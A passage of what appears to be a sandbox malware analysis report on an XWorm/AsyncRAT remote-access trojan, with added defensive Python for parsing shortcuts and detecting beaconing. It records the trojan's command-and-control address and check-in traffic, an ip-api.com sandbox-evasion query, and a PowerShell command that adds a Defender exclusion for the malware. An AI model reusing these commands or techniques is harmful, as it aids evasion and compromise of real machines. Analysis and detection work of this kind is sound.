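        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        info = off
        size, _hdr, iflags, _vol, base_off, _net, suffix_off = struct.unpack_from("<7I", data, info)
        if iflags & VOLUME_ID_AND_LOCAL_BASE_PATH:  # local path = LocalBasePath + CommonPathSuffix
            target = _cstr(data, info + base_off) + _cstr(data, info + suffix_off)
        off += size
    strings = {}
    for flag, name in STRING_FIELDS:                 # each field: u16 char count, then the chars
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + width * count]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            off += width * count
    return {"target": target, "file_size": file_size, "attributes": attrs, **strings}


def is_suspicious_target(target: str) -> bool:
    """Assumed rule: an executable launched from a user-writable profile directory."""
    t = target.lower()
    return t.endswith((".exe", ".scr", ".bat", ".cmd", ".vbs", ".js")) and any(
        part in t for part in ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\"))


def build_lnk(target: str, relative_path: str, file_size: int) -> bytes:
    """Constructed minimal shortcut: header, LinkInfo with a local path, RELATIVE_PATH."""
    flags = HAS_LINK_INFO | HAS_RELATIVE_PATH | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags, 0x20,
                         0, 0, 0, file_size, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0x12345678, 0x10) + b"\x00"  # fixed disk, empty label
    base, suffix, hdr = target.encode("latin-1") + b"\x00", b"\x00", 0x1C
    body = volume_id + base + suffix
    link_info = struct.pack("<7I", hdr + len(body), hdr, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            hdr, hdr + len(volume_id), 0, hdr + len(volume_id) + len(base)) + body
    rel = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    return header + link_info + rel


SAMPLE_LNK = build_lnk(r"C:\Users\user\AppData\Roaming\SystemUser32.exe",
                       r"..\..\..\..\..\SystemUser32.exe", 42496)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print(info["target"], info["file_size"], is_suspicious_target(info["target"]))
```

Run it over a real shortcut with parse_lnk(open(path, "rb").read()); shortcuts that only carry a LinkTargetIDList and no LinkInfo (network or virtual targets) return target=None and need an item-ID parser, which this example does not include.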
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):42496
                                              Entropy (8bit):5.552475995005772
                                              Encrypted:false
                                              SSDEEP:768:LrJDweBDuOkScrbsN/x6etCAr43MxfJF5Pa9p+M6iOwhk3/ibh:pDwewicrbsN/YSRrNRF49IM6iOwKa9
                                              MD5:9425780161C1CB105CD206D3F4FC6FA8
                                              SHA1:20608510EF22B09E5E874268B61D726AC0218C45
                                              SHA-256:AF9CE09585744C97E4C856C8E6124D8A842714DFD5101E27EAFF721220679802
                                              SHA-512:DE6AE6BD447FD34262ECC0F0FADD287EB17BD22CC0F775102233DE8A1B18B45B920ECBF94DB6540D1F9AB9E5FD21AFF6F8939D0C51D7574C1FAE1A1181E56F71
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 84%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..g................................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......D^...[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.552475995005772
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:5q4X9fRo4b.exe
                                              File size:42'496 bytes
                                              MD5:9425780161c1cb105cd206d3f4fc6fa8
                                              SHA1:20608510ef22b09e5e874268b61d726ac0218c45
                                              SHA256:af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802
                                              SHA512:de6ae6bd447fd34262ecc0f0fadd287eb17bd22cc0f775102233de8a1b18b45b920ecbf94db6540d1f9ab9e5fd21aff6f8939d0c51d7574c1fae1a1181e56f71
                                              SSDEEP:768:LrJDweBDuOkScrbsN/x6etCAr43MxfJF5Pa9p+M6iOwhk3/ibh:pDwewicrbsN/YSRrNRF49IM6iOwKa9
                                              TLSH:04133A457BE44216D5FFABF918B362060B70F6038D13D79E4CD89A9B1B37B808A01BD6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..g................................. ........@.. ....................................@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x40ba1e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6705E266 [Wed Oct 9 01:54:46 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (this instruction repeats for the rest of the dump: the bytes after the stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
The single jmp through the IAT slot at 0x402000 (image base 0x400000 plus the IAT directory at RVA 0x2000, listed below) is the standard native entry stub of a .NET executable: it hands control to the only import, mscoree.dll!_CorExeMain, and the managed code is located through the CLR header referenced by IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb9c4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x510 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9a24 | 0x9c00 | 743abcb702ffadf53d78bb160244a199 | False | 0.48717948717948717 | data | 5.664155435394303 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x510 | 0x600 | a17e9966a71bebc4a0c726e8a0465682 | False | 0.3854166666666667 | data | 3.8100922809276163 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 229088d024621b8eb6aa4c77f9d0b766 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x27c | data | | | 0.4559748427672956
RT_MANIFEST | 0xc320 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-09T23:05:13.613687+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:13.613687+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:13.801889+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:14.081790+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:14.091945+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:26.994236+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:26.995996+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:39.903187+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:39.905710+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:43.622791+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:43.622791+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:52.835200+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:52.837470+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:06:05.732794+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:05.734423+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:06:13.629708+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:13.629708+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:14.794101+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:14.794890+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 23:04:08.100456953 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:04:08.105391979 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 9, 2024 23:04:08.105482101 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:04:08.106169939 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:04:08.111644030 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 9, 2024 23:04:08.622498989 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 9, 2024 23:04:08.668478012 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:04:43.592120886 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 9, 2024 23:04:43.592474937 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:00.806761980 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:00.811660051 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:00.811760902 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:00.883759975 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:00.889024019 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:13.613687038 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:13.668839931 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:13.801888943 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:13.806809902 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:14.081789970 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:14.091944933 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:14.096755028 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:26.716007948 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:26.721092939 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:26.994235992 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:26.995995998 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:27.002087116 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:39.638457060 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:39.643407106 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:39.903187037 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:39.905709982 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:39.910717010 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:43.622791052 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:43.669022083 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:48.654572964 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:48.965852022 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:49.575239897 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:50.778383970 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:52.559967995 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:52.564876080 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:52.835200071 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:52.837470055 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:05:52.842420101 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:05:53.184623003 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:05:57.997210026 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:06:05.466459036 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:06:05.471548080 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:05.732794046 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:05.734422922 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:06:05.739315987 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:07.606890917 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 9, 2024 23:06:13.629708052 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:13.684711933 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:06:14.373671055 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:06:14.536256075 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:14.794101000 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
Oct 9, 2024 23:06:14.794889927 CEST | 49933 | 10406 | 192.168.2.7 | 147.185.221.17
Oct 9, 2024 23:06:14.800748110 CEST | 10406 | 49933 | 147.185.221.17 | 192.168.2.7
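The TCP table above contains two client flows: the one-shot HTTP request to ip-api.com (192.168.2.7:49699 to 208.95.112.1:80, followed from 23:05:48 by a tail of unanswered client packets at doubling intervals) and the XWorm session 192.168.2.7:49933 to 147.185.221.17:10406, in which the client opens a new exchange at 23:05:00, :13, :26, :39, :52 and 23:06:05, a 13-second cadence that lines up with the Suricata check-in alerts. The following is an added example, not part of the Joe Sandbox report, of a small beaconing detector over such a packet list: it keeps client-originated packets, collapses each run of closely spaced packets into one check-in, and reports a flow as periodic when at least three inter-check-in gaps, and at least half of them, agree on a period within 10 %. The packet rows are a constructed subset of the table above (client side only, microsecond precision); the local network, the burst gap and the thresholds are assumptions.

```python
"""Flag periodic client-to-server traffic (beaconing) in a packet list.
Added example, not part of the Joe Sandbox report. PACKETS is a constructed
subset of the report's TCP table: only the client-originated rows, times cut to
microseconds, as "<date> <time> <src port> <dst port> <src ip> <dst ip>"."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import median

LOCAL_NET = ip_network("192.168.2.0/24")  # sandbox client network (assumption)
BURST_GAP = 2.0     # seconds of silence that separate two check-ins (assumption)
TOLERANCE = 0.10    # gaps within +/-10 % of a candidate period count as matches
MIN_SUPPORT = 3     # at least this many matching gaps, and at least half of all gaps

PACKETS = """
2024-10-09 23:04:08.100456 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:04:08.105482 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:04:08.106169 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:04:08.668478 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:04:43.592474 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:00.806761 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:00.811760 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:00.883759 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:13.668839 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:13.801888 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:14.091944 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:26.716007 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:26.995995 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:39.638457 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:39.905709 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:43.669022 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:48.654572 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:48.965852 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:49.575239 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:50.778383 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:52.559967 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:52.837470 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:05:53.184623 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:05:57.997210 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:06:05.466459 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:06:05.734422 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:06:07.606890 49699 80 192.168.2.7 208.95.112.1
2024-10-09 23:06:13.684711 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:06:14.373671 49933 10406 192.168.2.7 147.185.221.17
2024-10-09 23:06:14.794889 49933 10406 192.168.2.7 147.185.221.17
"""


def parse_packets(text):
    """List of (timestamp, src ip, src port, dst ip, dst port), one per non-empty line."""
    pkts = []
    for line in text.splitlines():
        if line.strip():
            date, time, sport, dport, src, dst = line.split()
            ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S.%f")
            pkts.append((ts, src, int(sport), dst, int(dport)))
    return pkts


def checkin_times(pkts):
    """Per outbound flow, the first packet of every burst (a burst is a run of
    packets less than BURST_GAP seconds apart); those are the check-in instants."""
    flows = defaultdict(list)
    for ts, src, sport, dst, dport in pkts:
        if ip_address(src) in LOCAL_NET and ip_address(dst) not in LOCAL_NET:
            flows[(src, sport, dst, dport)].append(ts)
    starts = {}
    for flow, times in flows.items():
        times.sort()
        starts[flow] = [times[0]] + [cur for prev, cur in zip(times, times[1:])
                                     if (cur - prev).total_seconds() > BURST_GAP]
    return starts


def find_period(starts):
    """Best-supported period as (seconds, matching gaps, total gaps), else None."""
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    best = None
    for cand in gaps:
        matching = [g for g in gaps if abs(g - cand) <= TOLERANCE * cand]
        if len(matching) >= MIN_SUPPORT and 2 * len(matching) >= len(gaps):
            if best is None or len(matching) > best[1]:
                best = (round(median(matching), 2), len(matching), len(gaps))
    return best


def find_beacons(text):
    """Map every periodic outbound flow to its period tuple; other flows are omitted."""
    beacons = {}
    for flow, starts in checkin_times(parse_packets(text)).items():
        period = find_period(starts)
        if period is not None:
            beacons[flow] = period
    return beacons


if __name__ == "__main__":
    for (sip, sport, dip, dport), (period, support, total) in find_beacons(PACKETS).items():
        print(f"{sip}:{sport} -> {dip}:{dport}: period {period}s ({support} of {total} gaps)")
```

On this input only the 147.185.221.17:10406 flow is reported, with a period of about 12.9 s. The rule deliberately tolerates outliers: the server-initiated PINGs (the inbound 2852874 alerts at 23:05:13, 23:05:43 and 23:06:13) make the client answer outside its own schedule, so demanding that every gap match the period would miss the beacon.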
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 23:04:08.086519003 CEST | 60334 | 53 | 192.168.2.7 | 1.1.1.1
Oct 9, 2024 23:04:08.093835115 CEST | 53 | 60334 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 9, 2024 23:04:08.086519003 CEST | 192.168.2.7 | 1.1.1.1 | 0x5644 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 9, 2024 23:04:08.093835115 CEST | 1.1.1.1 | 192.168.2.7 | 0x5644 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                              • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 1408 | C:\Users\user\Desktop\5q4X9fRo4b.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 23:04:08.106169939 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Oct 9, 2024 23:04:08.622498989 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 21:04:07 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 53
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
The fields=hosting query asks ip-api.com whether the sandbox's egress address belongs to a hosting or data-center range, a cheap check for analysis environments that needs no local artifacts. Here the answer is false, and the session to 147.185.221.17:10406 begins 52 seconds later. The request goes out over plain HTTP with a bare Host header and no User-Agent, which makes it easy to spot in proxy logs.



                                              Target ID:0
                                              Start time:17:04:03
                                              Start date:09/10/2024
                                              Path:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\5q4X9fRo4b.exe"
                                              Imagebase:0xd30000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:8
                                              Start time:17:04:07
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                                              Imagebase:0x230000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:17:04:07
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:17:04:13
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
